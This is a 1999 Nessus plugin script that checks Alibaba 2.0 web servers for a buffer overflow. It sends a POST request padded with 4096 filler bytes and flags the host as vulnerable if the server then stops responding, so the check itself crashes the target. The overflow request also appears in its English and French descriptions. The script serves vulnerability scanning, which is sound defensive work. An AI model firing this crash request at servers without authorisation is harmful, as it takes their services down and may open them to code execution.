#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10012);
 
 name["english"] = "Alibaba 2.0 buffer overflow";
 name["francais"] = "Dpassement de buffer dans Alibaba 2.0";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "It is possible to make the remote web server execute
arbitrary code by sending the following request :

	POST AA[...]AA / HTTP/1.0
	
This problem may allow an attacker to execute arbitrary code on
the remote system or create a denial of service.

Solution : None at this time. Use another web server
Risk factor : High";

 desc["francais"] = "Il est possible de faire executer du code arbitraire
 un serveur faisant tourner Alibaba 2.0 en lui envoyant la
commande suivante :

	POST AA[...]AAA/ HTTP/1.0
	
Ce problme peut permettre  un pirate d'executer du
code arbitraire sur le systme distant, ou de mettre
le systme hors-service.

Solution : Aucune. Utilisez un autre serveur web
Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Alibaba buffer overflow";
 summary["francais"] = "Dpassement de buffer dans Alibaba";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "www_too_long_url.nasl");
 script_exclude_keys("www/too_long_url_crash");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

# if the server already crashes because of a too long
# url, go away

too_long = get_kb_item("www/too_long_url_crash");
if(too_long)exit(0);

port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port))
{
 data = string("POST ", crap(4096), " / HTTP/1.0\r\n\r\n");
 soc = open_sock_tcp(port);
 if(soc > 0)
 {
  send(socket:soc, data:data);
  close(soc);
  soc2 = open_sock_tcp(port);
  if(!soc2)security_hole(port);
  else close(soc2);
 }
}
